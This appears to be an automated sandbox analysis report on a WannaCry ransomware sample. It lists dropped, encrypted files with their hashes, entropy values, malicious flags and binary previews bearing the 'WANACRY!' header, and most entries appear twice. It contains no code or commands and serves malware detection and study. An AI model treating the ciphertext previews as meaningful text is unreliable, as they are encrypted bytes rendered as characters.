                                                                              Preview:WANACRY!....y.^...........-(b....a..l...@.....De...q-.v.k........4.gO.rX.GZ._In....S..U...|...M...8......E.T....z.......b.....J^......*HK..+w.....!...lj...[.u.......IO.P...o....@......(..9.A.+4..JP.....6.Z.x.....R......a......W.{ye...*.9.w..Z..$n.i.m.....N.....G........Z..;O7...F........../...+'.x.~....@6.....R...=...hm..v..}...j....b3.;.).Y+....h\lo.%.Ir.9...U...yY.......,.A..M..yC....Tz`f,...C....d.l.U.?B.t@........r..4..(9=.O...4...i..{,...9X..\>A.U.m|.l..-...<...v.^Zl?.f_w...e.._.M...]P.E....$.....7.^..............[pab ...H2...............}1.K.ec)<..zN4.E.*.B......m..VL........O.HK...e.mgD.._^.4,....X.,.i.....K.@.T.S...D(...x...&?...&.....K.x...|..gp.7...}t.jiq..[l..k.b..l..=*^.f..?..*%.E.....5...=...)..1...q..*.~..<..q.I..`a....V.H...vL.Q.#7yx.cM....%..0... ...oZ2.............U>E..n..4E.)).&$....2..b...g.........o.V:.j......bv\..hPn,.. ...a."./p.. ...E........$..*."..Z.C.F....$...O.>...p..M6..R.`..v.]...m..mA...5..o?.S..V.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1394952
                                                                              Entropy (8bit):7.9998560902356965
                                                                              Encrypted:true
                                                                              SSDEEP:24576:jmkBg1P5f+oe2mANENv9u7Y4Xbxv2TcI6v1jpcD7T:CkuxK2mAGlG1gIvDU
                                                                              MD5:509CDA1B535BCA521B12DEBA1B1C654A
                                                                              SHA1:2CFE31753F803E3331C78DD5C8027E3A8EE12CAD
                                                                              SHA-256:E2AC36123BE80A2315CBACC61A194FE19581F7FED4FF8C6D10F25880AE0197F7
                                                                              SHA-512:2F94C5A3E1420ACDF9AEE96423215A48B79AEB488110913722C48EA6B1A55A899C9C2009FE895675675D6BED47A1FC937620EEF77DF6B38B5610B8B1009BD39E
                                                                              Malicious:true
                                                                              Preview:WANACRY!....y.^...........-(b....a..l...@.....De...q-.v.k........4.gO.rX.GZ._In....S..U...|...M...8......E.T....z.......b.....J^......*HK..+w.....!...lj...[.u.......IO.P...o....@......(..9.A.+4..JP.....6.Z.x.....R......a......W.{ye...*.9.w..Z..$n.i.m.....N.....G........Z..;O7...F........../...+'.x.~....@6.....R...=...hm..v..}...j....b3.;.).Y+....h\lo.%.Ir.9...U...yY.......,.A..M..yC....Tz`f,...C....d.l.U.?B.t@........r..4..(9=.O...4...i..{,...9X..\>A.U.m|.l..-...<...v.^Zl?.f_w...e.._.M...]P.E....$.....7.^..............[pab ...H2...............}1.K.ec)<..zN4.E.*.B......m..VL........O.HK...e.mgD.._^.4,....X.,.i.....K.@.T.S...D(...x...&?...&.....K.x...|..gp.7...}t.jiq..[l..k.b..l..=*^.f..?..*%.E.....5...=...)..1...q..*.~..<..q.I..`a....V.H...vL.Q.#7yx.cM....%..0... ...oZ2.............U>E..n..4E.)).&$....2..b...g.........o.V:.j......bv\..hPn,.. ...a."./p.. ...E........$..*."..Z.C.F....$...O.>...p..M6..R.`..v.]...m..mA...5..o?.S..V.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):488
                                                                              Entropy (8bit):7.515548000372738
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEO16MzcWOWyoXJQ8LWxB01yPDcLO4iI1poxhdvn:bkfMMYW99LWxK1yg6gKBn
                                                                              MD5:45184B31375B8176A9B04E3EE5E9C94E
                                                                              SHA1:3C67B851D869C49FA6CFA88AE6A25E81729D3167
                                                                              SHA-256:5EA247F3E3DB33A0981C399276449A33AD2F3CDD0CF4ACF9C6475F01CA7810BF
                                                                              SHA-512:B37C7B52B141A89E9297B3705819F333004ACF5ECB2FFCBFBA198C5DDE544B1683536974A2DEDCC46BB0F889053B4B6A0744FE216B3E06F6CBB6E005BF0FEC0E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......O...z....G.|.\.Nj]...B-.~.3.!.S%......u*.y.q..Lj.....)....}.KM.*K.. ..V:....m..C..`.W...-.m+....6uT....l.3...?.B.G.AH...l...D-........OQ*.........T.r......!.G.L..]g2c...6.!.0....e..........~...s...Z|.N.J.B.&.....Q...?mO.2>..T....X.[.&..s..Xq^..8............)%..A$...2...t.=......v..#&,.~.?.......}....No.7.`C./4..g.ZQ.W.H..)F....#....a..Z .|.......Ka(A.K.o.E........u&#....H.(;8.....P..F.[...vHr...?7.......m........}0....t.........)F...B...'1t.jQs?Gf.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):488
                                                                              Entropy (8bit):7.515548000372738
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEO16MzcWOWyoXJQ8LWxB01yPDcLO4iI1poxhdvn:bkfMMYW99LWxK1yg6gKBn
                                                                              MD5:45184B31375B8176A9B04E3EE5E9C94E
                                                                              SHA1:3C67B851D869C49FA6CFA88AE6A25E81729D3167
                                                                              SHA-256:5EA247F3E3DB33A0981C399276449A33AD2F3CDD0CF4ACF9C6475F01CA7810BF
                                                                              SHA-512:B37C7B52B141A89E9297B3705819F333004ACF5ECB2FFCBFBA198C5DDE544B1683536974A2DEDCC46BB0F889053B4B6A0744FE216B3E06F6CBB6E005BF0FEC0E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......O...z....G.|.\.Nj]...B-.~.3.!.S%......u*.y.q..Lj.....)....}.KM.*K.. ..V:....m..C..`.W...-.m+....6uT....l.3...?.B.G.AH...l...D-........OQ*.........T.r......!.G.L..]g2c...6.!.0....e..........~...s...Z|.N.J.B.&.....Q...?mO.2>..T....X.[.&..s..Xq^..8............)%..A$...2...t.=......v..#&,.~.?.......}....No.7.`C./4..g.ZQ.W.H..)F....#....a..Z .|.......Ka(A.K.o.E........u&#....H.(;8.....P..F.[...vHr...?7.......m........}0....t.........)F...B...'1t.jQs?Gf.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2040
                                                                              Entropy (8bit):7.894976747956148
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkeHkGqlgZLEUtcsgbfuPeQFUA+71UKoUGYXBBL/0J2WqdvjFr2NgTR:oeEGqlgZLEUenT0GA+OKnxBr0J2WqzrL
                                                                              MD5:C1B9787FF00D2DB2BBCDF60512790641
                                                                              SHA1:627C50D903BA727FAEC9E29704694467CB53C557
                                                                              SHA-256:489926A57BB427854BD2EAA486A47FE2386F3B4D3DBD25FCDFD9A01FE13E4E27
                                                                              SHA-512:4E7A03FB86ADB873C4BC0902E5D60AADBB5DEEAE994C3E964E2F804C28B170AFEB024E1874ADFC6463DBD824AC5B21DE95608114B077CE6C776E290B86A9C7B9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G.a.MA..$.O'A.M...X.`..!."..CH.^....i"...CWm-...Q.q|.1ioezj...{v...*.g..B.]..8t....}b..9...Q.<.1CL.N'../#h^<R.'.<.0V.`...S..1../.YT....&.KA."..?.~.u..[....w.0f.i...C).^8<....]"....}j../..NT....{...Lr.:..b.x(....Q..2N..s./..N....&..j....P.\..io.<..............8.+@c..*...lO....E...g...U...T...W....9u....Y.I`.....:...;.Q{.........*f.4...t...`...CC..|/.W..$.....!l..M6,*/rt...2..^^.H.....K.....c`..Zk8..][A.H.>-..@1u.0....v..;y....8.E9]s........3.L[C..%m...)..f..d..#.v...56'....Z"){D...2.S[..u..}=|..L.h..#.!...y.....M.(......!..6.u...Xz.71...XJ..S."..}i......2W}..Y&.#..........2:..E1j..........?.9e...\-....`J.=K.........^....S8....m......:L...viV!|uN|.......3.h&.....,.E.W$....<@...,{......gt...p.!.*......r..H.....;..M....IH..[z5..w.W+n..L.p,..y..4........P.......<....fN.....b..:...Z...* D.qB;.....P....~.2..fT...4.$VU[.[...9..'@..w..Z-.8N*.6."..y..6....|.L...6Q..X>l..].F^.].f.9..h.N*?a.NV..h..!..PRI."C..@...#..|..D`......X...p..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2040
                                                                              Entropy (8bit):7.894976747956148
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkeHkGqlgZLEUtcsgbfuPeQFUA+71UKoUGYXBBL/0J2WqdvjFr2NgTR:oeEGqlgZLEUenT0GA+OKnxBr0J2WqzrL
                                                                              MD5:C1B9787FF00D2DB2BBCDF60512790641
                                                                              SHA1:627C50D903BA727FAEC9E29704694467CB53C557
                                                                              SHA-256:489926A57BB427854BD2EAA486A47FE2386F3B4D3DBD25FCDFD9A01FE13E4E27
                                                                              SHA-512:4E7A03FB86ADB873C4BC0902E5D60AADBB5DEEAE994C3E964E2F804C28B170AFEB024E1874ADFC6463DBD824AC5B21DE95608114B077CE6C776E290B86A9C7B9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....G.a.MA..$.O'A.M...X.`..!."..CH.^....i"...CWm-...Q.q|.1ioezj...{v...*.g..B.]..8t....}b..9...Q.<.1CL.N'../#h^<R.'.<.0V.`...S..1../.YT....&.KA."..?.~.u..[....w.0f.i...C).^8<....]"....}j../..NT....{...Lr.:..b.x(....Q..2N..s./..N....&..j....P.\..io.<..............8.+@c..*...lO....E...g...U...T...W....9u....Y.I`.....:...;.Q{.........*f.4...t...`...CC..|/.W..$.....!l..M6,*/rt...2..^^.H.....K.....c`..Zk8..][A.H.>-..@1u.0....v..;y....8.E9]s........3.L[C..%m...)..f..d..#.v...56'....Z"){D...2.S[..u..}=|..L.h..#.!...y.....M.(......!..6.u...Xz.71...XJ..S."..}i......2W}..Y&.#..........2:..E1j..........?.9e...\-....`J.=K.........^....S8....m......:L...viV!|uN|.......3.h&.....,.E.W$....<@...,{......gt...p.!.*......r..H.....;..M....IH..[z5..w.W+n..L.p,..y..4........P.......<....fN.....b..:...Z...* D.qB;.....P....~.2..fT...4.$VU[.[...9..'@..w..Z-.8N*.6."..y..6....|.L...6Q..X>l..].F^.].f.9..h.N*?a.NV..h..!..PRI."C..@...#..|..D`......X...p..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):843176
                                                                              Entropy (8bit):7.999781731652574
                                                                              Encrypted:true
                                                                              SSDEEP:12288:Z2mL890Gzwf50nfH7AX5JTFCrFwy8NW+C86g59ldbkJMpvr9uWdUdp42:ZTLUz4C/8XPTO+CXC4Jor9rdSp
                                                                              MD5:27763089A5AB05292400760B77A7C7CE
                                                                              SHA1:B34BC68A124A04F403A0EF36584DCC6C3735D15A
                                                                              SHA-256:5A910118B2E8EB989D32A9BC913AFA62CE2D92B1F8AF3FA2A0A08482E1466142
                                                                              SHA-512:DC24B4FAB3F3E422D0C9C59807D19F5FA29CA6F5A3109911FAC075A913BED3CB417C79D8F0B6E0971CD740AA5AAEC50FE0CEBB0719287ADEF8F039364C5A0DA1
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......c..".oM.......2.O%.:.M.?<....x..Z...C..Z3yf.`.C.....U.rW.....8G.!.4.H7)a'....c.[..zQ8 ..Pt3.....N..OE..@m~0.....=BX....~`..m<]..k...!\.......k..K...R.h.H=....,....d,>...-.x7.*.h6A..w...7$x...1~..PF. b...m..;z.|...:e.!.m/+0.....O...?..^.w..>............`A.8l...w,G .L.c.+F...!.hP..:..........y..M..1V..6g..N..^.I..j..5..r.A.3))..U..*.b...kA....(Md...r.<.~.0.cJT..y.g=..j.[.5..F..`w.h%.sy.9...,P..%...[f...MZ......X..n....yX.*.o...6f/u....\(.....Sn.7..zw..u...#.f.;.V..G...b./.O......uo...LVl0H..k..Z.q.\.|.K.+.i.b.,HV.r*......!.?..Y..1...R....0;......+,.4........H....u../...]......j.W.?.j8..6....j..>j'.#;6..$.j....E.....K.rH.K...O..J..@c%.........;...X...V/qh.i......l.I...&Y..L.?.+..F...c..D&.H.ZX+.f2 vj.5.`/<g..$....-3.X&...0.b.om".....*...<~....y^.....&B..d.....q..\hM.j.....oE.06.V%.Q..t^%........Fq..N..2....BB..#.y..dD.gz1|j.2VGw.......m.-Y;..-d>,.;<....|)x..z.....2...7E.1...01........82..l.-....{...X\..e..|...C.P..]...RH3(eQ.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):843176
                                                                              Entropy (8bit):7.999781731652574
                                                                              Encrypted:true
                                                                              SSDEEP:12288:Z2mL890Gzwf50nfH7AX5JTFCrFwy8NW+C86g59ldbkJMpvr9uWdUdp42:ZTLUz4C/8XPTO+CXC4Jor9rdSp
                                                                              MD5:27763089A5AB05292400760B77A7C7CE
                                                                              SHA1:B34BC68A124A04F403A0EF36584DCC6C3735D15A
                                                                              SHA-256:5A910118B2E8EB989D32A9BC913AFA62CE2D92B1F8AF3FA2A0A08482E1466142
                                                                              SHA-512:DC24B4FAB3F3E422D0C9C59807D19F5FA29CA6F5A3109911FAC075A913BED3CB417C79D8F0B6E0971CD740AA5AAEC50FE0CEBB0719287ADEF8F039364C5A0DA1
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......c..".oM.......2.O%.:.M.?<....x..Z...C..Z3yf.`.C.....U.rW.....8G.!.4.H7)a'....c.[..zQ8 ..Pt3.....N..OE..@m~0.....=BX....~`..m<]..k...!\.......k..K...R.h.H=....,....d,>...-.x7.*.h6A..w...7$x...1~..PF. b...m..;z.|...:e.!.m/+0.....O...?..^.w..>............`A.8l...w,G .L.c.+F...!.hP..:..........y..M..1V..6g..N..^.I..j..5..r.A.3))..U..*.b...kA....(Md...r.<.~.0.cJT..y.g=..j.[.5..F..`w.h%.sy.9...,P..%...[f...MZ......X..n....yX.*.o...6f/u....\(.....Sn.7..zw..u...#.f.;.V..G...b./.O......uo...LVl0H..k..Z.q.\.|.K.+.i.b.,HV.r*......!.?..Y..1...R....0;......+,.4........H....u../...]......j.W.?.j8..6....j..>j'.#;6..$.j....E.....K.rH.K...O..J..@c%.........;...X...V/qh.i......l.I...&Y..L.?.+..F...c..D&.H.ZX+.f2 vj.5.`/<g..$....-3.X&...0.b.om".....*...<~....y^.....&B..d.....q..\hM.j.....oE.06.V%.Q..t^%........Fq..N..2....BB..#.y..dD.gz1|j.2VGw.......m.-Y;..-d>,.;<....|)x..z.....2...7E.1...01........82..l.-....{...X\..e..|...C.P..]...RH3(eQ.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11832
                                                                              Entropy (8bit):7.982791149994795
                                                                              Encrypted:false
                                                                              SSDEEP:192:KhHRBXjT39SuJl9U/P5hzObg5AFIMn5Nu6xrkF3/1glaNnzGrK+1KNWLHznBmoYb:AbSuJE3/zObg5AFIMnW618vela0rfYWw
                                                                              MD5:B11287EA0E1A0DE93EAF8278731A2134
                                                                              SHA1:2E73A47CB3528AFA9FDD1DBE02C63FF1E8BA8A9F
                                                                              SHA-256:E409EE2F149B42EF55AD384154248820E7B2BC79BDE0FD98B0ED50B58F89E1F6
                                                                              SHA-512:1889ADEF7F939E9373DF4913A0B645E307075FEB72E899A480E024201F02C595DA6A3EA1998CF783615F5EF0F2B3090CE3DCF51A1B63166D0C40AF2111C16360
                                                                              Malicious:false
                                                                              Preview:WANACRY!........}a...e...aN....Qx.=!..2.{y..o.&x...~...R'.......i.....k".4n.0.........j...tH.w....0...V"..(..t......<..u..*07..qW.?..V.s.w3...'........o..by*"..f...Jj..B..#@;..o..n......2.....k........Y...0I..[..>.f.....N.M.}....U..*..w!..5..4j.wFE...J......-......)..w.^.7.q.6_d....w8W.s...{3B?)q...E$.|.={.p..g...Y..!]......-I6..W)..>w......=.3.B.....Q[.sR.;.s>...+\G4..!.i..l..!`....!3.mC..S`.`.p........b....vw..`.M!rPM5. ,....W5w.c...*S+.$?e.Z.I....t}.Z7.;uc...=.d.7.....Y.j... .Rz...}G .C.$i.U..+d.6R.;.lmi..e.P_f2;zl....QL..;H..i.....t....SAWKB..Yc.x...v..h...<.X.Q[.I..L.Z.....M.R.x.....s...8.p....y....@.yj.1p2zB8h=?.H..nW....jG...y.I.x.....m*.SU..S.@...v.=1r.r.z....Mk...ZC4w.^jx\.=.:....w.BG.sU....TB..%..D.Q../G<.F`hy0A......p*@.%.|.n>. }....w..{f.......E<E.f.c../....C.nX..$.7f.....,o...}Q.;.\.[Io#.^>t.Q=1....d.}P.-.N.M.-.'..`J....L(.].s....Tv'B......`...2.....;.B(m......(......?..=K..B..#..*.....y.5.$9.\.....SSJ.....l,#d...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11832
                                                                              Entropy (8bit):7.982791149994795
                                                                              Encrypted:false
                                                                              SSDEEP:192:KhHRBXjT39SuJl9U/P5hzObg5AFIMn5Nu6xrkF3/1glaNnzGrK+1KNWLHznBmoYb:AbSuJE3/zObg5AFIMnW618vela0rfYWw
                                                                              MD5:B11287EA0E1A0DE93EAF8278731A2134
                                                                              SHA1:2E73A47CB3528AFA9FDD1DBE02C63FF1E8BA8A9F
                                                                              SHA-256:E409EE2F149B42EF55AD384154248820E7B2BC79BDE0FD98B0ED50B58F89E1F6
                                                                              SHA-512:1889ADEF7F939E9373DF4913A0B645E307075FEB72E899A480E024201F02C595DA6A3EA1998CF783615F5EF0F2B3090CE3DCF51A1B63166D0C40AF2111C16360
                                                                              Malicious:false
                                                                              Preview:WANACRY!........}a...e...aN....Qx.=!..2.{y..o.&x...~...R'.......i.....k".4n.0.........j...tH.w....0...V"..(..t......<..u..*07..qW.?..V.s.w3...'........o..by*"..f...Jj..B..#@;..o..n......2.....k........Y...0I..[..>.f.....N.M.}....U..*..w!..5..4j.wFE...J......-......)..w.^.7.q.6_d....w8W.s...{3B?)q...E$.|.={.p..g...Y..!]......-I6..W)..>w......=.3.B.....Q[.sR.;.s>...+\G4..!.i..l..!`....!3.mC..S`.`.p........b....vw..`.M!rPM5. ,....W5w.c...*S+.$?e.Z.I....t}.Z7.;uc...=.d.7.....Y.j... .Rz...}G .C.$i.U..+d.6R.;.lmi..e.P_f2;zl....QL..;H..i.....t....SAWKB..Yc.x...v..h...<.X.Q[.I..L.Z.....M.R.x.....s...8.p....y....@.yj.1p2zB8h=?.H..nW....jG...y.I.x.....m*.SU..S.@...v.=1r.r.z....Mk...ZC4w.^jx\.=.:....w.BG.sU....TB..%..D.Q../G<.F`hy0A......p*@.%.|.n>. }....w..{f.......E<E.f.c../....C.nX..$.7f.....,o...}Q.;.\.[Io#.^>t.Q=1....d.}P.-.N.M.-.'..`J....L(.].s....Tv'B......`...2.....;.B(m......(......?..=K..B..#..*.....y.5.$9.\.....SSJ.....l,#d...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):408
                                                                              Entropy (8bit):7.405724821772329
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEeqtGfTS92CR+80lxvGlElG15HTakerV9XrnY:bkbqtG+AM+3lklEaTakerDrY
                                                                              MD5:D6C58BF5EFBA8FCD1FE653C0730107C7
                                                                              SHA1:AE7F5AF7F69F2AB1DBD55A46B9076B26D29D2F6D
                                                                              SHA-256:A5AED1CAA029E1098CFAAC0E9105996E353D14860F7ECEEB773B08D2DC1F807E
                                                                              SHA-512:341382294B511DCC8DDC7E494B319F46D6047FC35B19EA07C931B36FC31EA78336E2B7C7FF948C952ACBF5D98FC753E56869663ECE9A51DD1E383A5B22D86F29
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........#C...-...i!....K<...d>B{Z..'8...'RB...Jy.g. ...G.....0.7x.?..y\.&4.q|./8.qK];R...w+.:.v....."..:.....,P......O._...X...(..s...Y.9.@..w..P..gW...77r~......Vc.A..8i=..6....7......?.x.....Y...0l....!V.....O...vT..QAT...Y7m...1.b3m+.okw.E.LE.@....y.......:..2RK..N.I.C. ....l...!!.8^ro.Q...mb.&..;.........3...:$.AB|;.h8....Np...~.8.n....@......Q..R!.r..L.....C......D..{%..7.+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):408
                                                                              Entropy (8bit):7.405724821772329
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEeqtGfTS92CR+80lxvGlElG15HTakerV9XrnY:bkbqtG+AM+3lklEaTakerDrY
                                                                              MD5:D6C58BF5EFBA8FCD1FE653C0730107C7
                                                                              SHA1:AE7F5AF7F69F2AB1DBD55A46B9076B26D29D2F6D
                                                                              SHA-256:A5AED1CAA029E1098CFAAC0E9105996E353D14860F7ECEEB773B08D2DC1F807E
                                                                              SHA-512:341382294B511DCC8DDC7E494B319F46D6047FC35B19EA07C931B36FC31EA78336E2B7C7FF948C952ACBF5D98FC753E56869663ECE9A51DD1E383A5B22D86F29
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........#C...-...i!....K<...d>B{Z..'8...'RB...Jy.g. ...G.....0.7x.?..y\.&4.q|./8.qK];R...w+.:.v....."..:.....,P......O._...X...(..s...Y.9.@..w..P..gW...77r~......Vc.A..8i=..6....7......?.x.....Y...0l....!V.....O...vT..QAT...Y7m...1.b3m+.okw.E.LE.@....y.......:..2RK..N.I.C. ....l...!!.8^ro.Q...mb.&..;.........3...:$.AB|;.h8....Np...~.8.n....@......Q..R!.r..L.....C......D..{%..7.+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):14632
                                                                              Entropy (8bit):7.989227593638076
                                                                              Encrypted:false
                                                                              SSDEEP:384:V6OJu8k+B316RAewpO0N6WYjJnXBYCd4DVEDFMwLusrhOu6LL4af/:VbRB38RATpEWY1xYVBkmwL1hOu6HH3
                                                                              MD5:5F270917A5B8E46ACDBF1EB921F632D8
                                                                              SHA1:64EF28207933E64D786338106841C6415683195F
                                                                              SHA-256:CFAEE8D0AB5FF3560533D11560275A190F29446015EE153FC9630CE0E55CAF08
                                                                              SHA-512:86945E40C5466909E9BFF58ADDA7677B3F9285F8A8ABB8D0896C7D7CA82D328FEF0277A9BB405EE2BACC43A455E05C0429D8CD20659A67CCEB6FCEF9C1CE80B3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....E.ADS O.".b..........)...O....A.....:.I.. ...G...M.........X._.A.....0.E....H..[.Gj...6.)./.e9X...cY>...i2.......q.~!.FK........Ah.d...C~.<....H.O..M&.2.t..|..X...g.zo!......,7E2Y..w5.y:..V.k...@.k9+...l.._awH..:.)....A.gO._H.U}.....X.O.Z[.n.....8......(Q..6.`..:..H....N.......)...U....d.".........ltp*.....k.W.i.G.k9.yU..Ia.).....-6(...f&...qiS.6")V.G@......X.f^........~.Ty......Vm.....YX.zC..v.ww.2.u&.VG....;5..km'[...b.k.{......nB..V|.(...*.a.>#5..m[.`_'7....F..0.s.dt@dw.....C...K.L..dX.E.cE .kF.lGpp.k...KG..v....s........CLxV../G.{...../......7b5.......e.b..N...B..k...`..NgAp.t~.`.u.7....:.......0.Y..*....v....m...h...No.......F.....vT.....;.w..F..$...._.e.nX.q.m..}.?...6.K....._8SKe...4.u%k+.7E.O........-1.04.Y.<.H-.....$..U.;..E...y.TP6.c...O{v..8z:."..D..+...C.Q...w7..f;.y..{.,.(4...x."...O./G.m.V.|....-c.....~...y.1........5..yG.q..W.4......TT..[z_0.H.[.A......\3.DZ.~..g...F.:..b....6C.sU...6|`7~....[...Y.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):14632
                                                                              Entropy (8bit):7.989227593638076
                                                                              Encrypted:false
                                                                              SSDEEP:384:V6OJu8k+B316RAewpO0N6WYjJnXBYCd4DVEDFMwLusrhOu6LL4af/:VbRB38RATpEWY1xYVBkmwL1hOu6HH3
                                                                              MD5:5F270917A5B8E46ACDBF1EB921F632D8
                                                                              SHA1:64EF28207933E64D786338106841C6415683195F
                                                                              SHA-256:CFAEE8D0AB5FF3560533D11560275A190F29446015EE153FC9630CE0E55CAF08
                                                                              SHA-512:86945E40C5466909E9BFF58ADDA7677B3F9285F8A8ABB8D0896C7D7CA82D328FEF0277A9BB405EE2BACC43A455E05C0429D8CD20659A67CCEB6FCEF9C1CE80B3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....E.ADS O.".b..........)...O....A.....:.I.. ...G...M.........X._.A.....0.E....H..[.Gj...6.)./.e9X...cY>...i2.......q.~!.FK........Ah.d...C~.<....H.O..M&.2.t..|..X...g.zo!......,7E2Y..w5.y:..V.k...@.k9+...l.._awH..:.)....A.gO._H.U}.....X.O.Z[.n.....8......(Q..6.`..:..H....N.......)...U....d.".........ltp*.....k.W.i.G.k9.yU..Ia.).....-6(...f&...qiS.6")V.G@......X.f^........~.Ty......Vm.....YX.zC..v.ww.2.u&.VG....;5..km'[...b.k.{......nB..V|.(...*.a.>#5..m[.`_'7....F..0.s.dt@dw.....C...K.L..dX.E.cE .kF.lGpp.k...KG..v....s........CLxV../G.{...../......7b5.......e.b..N...B..k...`..NgAp.t~.`.u.7....:.......0.Y..*....v....m...h...No.......F.....vT.....;.w..F..$...._.e.nX.q.m..}.?...6.K....._8SKe...4.u%k+.7E.O........-1.04.Y.<.H-.....$..U.;..E...y.TP6.c...O{v..8z:."..D..+...C.Q...w7..f;.y..{.,.(4...x."...O./G.m.V.|....-c.....~...y.1........5..yG.q..W.4......TT..[z_0.H.[.A......\3.DZ.~..g...F.:..b....6C.sU...6|`7~....[...Y.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1946312
                                                                              Entropy (8bit):7.999911469397103
                                                                              Encrypted:true
                                                                              SSDEEP:49152:H1P5lxJpzdovVzmbKEA7GVoY0Dus/MBc7wo:VPPx7zavSoXDuK7D
                                                                              MD5:65C9736235D820B7883679AC04F06D5D
                                                                              SHA1:610B800E44C54EE7C05EDFB7CBBE29DA51AB0FB8
                                                                              SHA-256:072F4498C766964963A4850E59BBA717AB6FF7EB9C5D3427FDAAD35360381E94
                                                                              SHA-512:32F8B8D446A6B23FA331BAC1D2BCCF2E7606ACB602FB2DA38A58C9BC8D3220897F5D58ECBE82B9479649AEB02984FFA0E87DB0D5A79E8B9985B35168B88EF179
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......D$........vk'..{h..........|!M}^r.s...OV......?......f.....|01.k.e.........G7..^.q..e...@t.;.*.....P>..;..h6+MP....O.@.".H.8..1.(2...@=..../|.iM..u.N..b......l...up.l.D.p.<.....h.....T.b.oc.fi..o.z..j&^.Cc.E..{%..W.BY.w. ..0]5FHx....?.:.@.''............!.v..p>.U)\{q...U ;x....P...i....?..HSK.P..M..._M.Z.x.V......\|.....(.86k.p.3C1o._o.}.....)..A..K}ag|GV...ei....,P#.!.|.....o..03S.%....*6Z.Nt..O.0...".@....n.T.3.s...6, .84.6.D..|.oG.G...o..|.D...t....m..Y.....).~......s8..=.rJh....3.uc....2H...........K.."........R.%...G.m.q.1.gh[.."t.].p.>.n....b^.....\. .....Yx..d..}KU.R!.?A.?^....\...{nh..KRc..d.+N.....m.....#!2'..1.8..,.....cd..........l6....SM..=..m...].>.90...SN.........6`5...(x/"..M.W)....S}....?~.5..1D....;.b. t.,..A..T.W..[N.v..wc.u...&..!........x...t+.a$tf.v.a....D..u.(E...Q.C......Q..6..s~.j......px@..^/."...#.Iz.wF...32...j<.0h....K......I.<..v..ez...................[a..v2.`.EZ........u..o......H..{.%..|+B./.E..;..d.P.jt.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1946312
                                                                              Entropy (8bit):7.999911469397103
                                                                              Encrypted:true
                                                                              SSDEEP:49152:H1P5lxJpzdovVzmbKEA7GVoY0Dus/MBc7wo:VPPx7zavSoXDuK7D
                                                                              MD5:65C9736235D820B7883679AC04F06D5D
                                                                              SHA1:610B800E44C54EE7C05EDFB7CBBE29DA51AB0FB8
                                                                              SHA-256:072F4498C766964963A4850E59BBA717AB6FF7EB9C5D3427FDAAD35360381E94
                                                                              SHA-512:32F8B8D446A6B23FA331BAC1D2BCCF2E7606ACB602FB2DA38A58C9BC8D3220897F5D58ECBE82B9479649AEB02984FFA0E87DB0D5A79E8B9985B35168B88EF179
                                                                              Malicious:true
